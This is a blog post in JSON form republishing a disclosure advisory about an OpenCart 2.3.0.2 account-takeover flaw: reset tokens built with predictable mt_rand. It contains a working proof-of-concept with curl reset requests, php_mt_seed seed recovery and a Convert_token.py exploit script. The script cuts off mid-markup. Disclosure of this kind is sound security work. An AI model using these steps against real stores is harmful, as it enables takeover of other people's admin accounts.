{"id":7117,"date":"2017-03-26T14:19:22","date_gmt":"2017-03-26T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/26\/news-908\/"},"modified":"2017-03-26T14:19:22","modified_gmt":"2017-03-26T22:19:22","slug":"news-908","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/03\/26\/news-908\/","title":{"rendered":"SSD Advisory \u2013 OpenCart Account Takeover"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Sun, 26 Mar 2017 13:14:58 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3022\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3022');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a account takeover vulnerability found in OpenCart (version 2.3.0.2). OpenCart is a opensource e-commerce platform written in PHP. <\/p>\n<p>&#8220;Opencart is an easy to-use, powerful, Open Source online store management program that can manage multiple online stores from a single back-end.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher &#8220;Ayrx&#8221; has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> The vendor had this response to our report:<br \/> &#8220;&#8230; another clown acting like james bond with a nonsense Vulnerability&#8221;<br \/> &#8220;james already told me it was bullshit so go ahead!&#8221;<\/p>\n<p><span id=\"more-3022\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>OpenCart versions 2.1.0.0 up till the latest release of 2.3.0.2 contains a token() function that generates tokens using PHP&#8217;s mt_rand function:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58d83e6967014166836564\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function token($length = 32) {  \t\/\/ Create random token  \t$string = &#8216;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&#8217;;    \t$max = strlen($string) &#8211; 1;    \t$token = &#8221;;    \tfor ($i = 0; $i &lt; $length; $i++) {  \t\t$token .= $string[mt_rand(0, $max)];  \t}    \treturn $token;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0031 seconds] -->  <\/p>\n<p>PHP&#8217;s <em>mt_rand<\/em> function is based on the <em>Mersenne Twister PRNG<\/em> which is not cryptographically strong and easily exploitable.<\/p>\n<p>In particular, the <em>token()<\/em> function is used in generating password reset tokens, which leads to an account takeover vulnerability.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The described proof of concept requires OpenCart running on a fresh PHP process. This is because PHP&#8217;s <em>mt_rand<\/em> is seeded once on process start.<\/p>\n<p>The scripts used are in the Exploit Scripts section of the report.<\/p>\n<p><u>Initial setup:<\/u><\/p>\n<ol>\n<li>Download OpenCart v2.3.0.2 from <a href=\"https:\/\/github.com\/opencart\/opencart\/archive\/2.3.0.2.tar.gz\" target=\"_blank\">here<\/a> <\/li>\n<li>Extract the files and rename <em>config-dist.php<\/em> and <em>admin\/config-dist.php<\/em> to <em>config.php<\/em> and <em>admin\/config.php<\/em><\/li>\n<li>Run the following command &#8220;<em>php -S 0.0.0.0:8000<\/em>&#8221; from <em>upload\/<\/em> folder<\/li>\n<li>Continue the installation through the web interface (<em>&#8216;127.0.0.1:8000&#8217;<\/em> for example) &#8211; Follow the installation <a href=\"http:\/\/docs.opencart.com\/installation\/\" target=\"_blank\">guide<\/a>  <\/li>\n<li>Register an account that belongs to the &#8220;attacker&#8221; &#8211; In this Proof of Concept we will use the email &#8216;<em>foo@abc.com<\/em>&#8216;, and admin@abc.com belongs to the account you want to takeover<\/li>\n<\/ol>\n<p><u>Attack:<\/u><\/p>\n<ol>\n<li><a href=\"http:\/\/www.openwall.com\/php_mt_seed\/\" target=\"_blank\">Download<\/a> and compile <em>php_mt_seed<\/em> v3.2. <\/li>\n<li>Send a password reset request for the <strong>attacker<\/strong> controlled email account<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58d83e6967024574085921\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl -X POST -F &#8220;email=foo@abc.com&#8221; localhost:8000\/index.php?route=account\/forgotten<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967024574085921-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58d83e6967024574085921-1\"><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">F<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;email=foo@abc.com&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">localhost<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8000<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">account<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">forgotten<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<li>Send a password reset request for the account you want to takeover<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58d83e696702a357205067\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl -X POST -F &#8220;email=admin@abc.com&#8221; localhost:8000\/admin\/index.php?route=common\/forgotten<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58d83e696702a357205067-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58d83e696702a357205067-1\"><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">F<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;email=admin@abc.com&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">localhost<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8000<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">common<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">forgotten<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<li>Find password reset token sent to <em>foo@abc.com<\/em><\/li>\n<li>Run python <a href=\"#Convert_token.py\">Convert_token.py<\/a> TOKEN.<\/li>\n<li>Run <em>.\/php_mt_seed<\/em> with output of <em>convert_token.py<\/em><\/li>\n<li>Edit the <em>$seed<\/em> variable in <em>Generate.php<\/em> with the seed discovered by <em>php_mt_seed<\/em><\/li>\n<li>Run the following command <em>&#8220;php Generate.php&#8221;<\/em> to discover the password reset token of admin@abc.com<\/li>\n<li>Go to &#8220;<em>localhost:8000\/admin\/index.php?route=common\/reset&#038;code=CODE<\/em>&#8221; with CODE replaced by the output of <em>Generate.php<\/em><\/li>\n<li>We have now taken over the admin account by resetting the password!<\/li>\n<\/ol>\n<p>Once again, this Proof of Concept requires the password reset requests be processed by a fresh PHP process (or a PHP process that has not called <em>mt_rand<\/em> before)<\/p>\n<p><a name=\"Convert_token.py\"><\/a><\/p>\n<p><strong>Exploit Scripts<\/strong><\/p>\n<p><u>Convert_token.py<\/u><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58d83e6967031653553671\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys      CHAR = &#8220;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&#8221;      def find_char(char):      for pos, val in enumerate(CHAR):          if val == char:              return pos      def main():      token = sys.argv[1]      out = &#8220;&#8221;        for i in token:          leak = str(find_char(i))          out += leak          out += &#8221; &#8221;          out += leak          out += &#8221; &#8221;          out += &#8220;0&#8221;          out += &#8221; &#8221;          out += &#8220;61&#8221;          out += &#8221; &#8221;          print(out)      if __name__ == &#8220;__main__&#8221;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967031653553671-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967031653553671-33\">33<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-4\"><span class=\"crayon-t\">CHAR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-7\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">find_char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pos<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">val <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enumerate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">CHAR<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">val<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pos<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-13\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">find_char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">leak<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-20\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">leak<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-22\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;61&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-28\">&nbsp;<\/div>\n<div 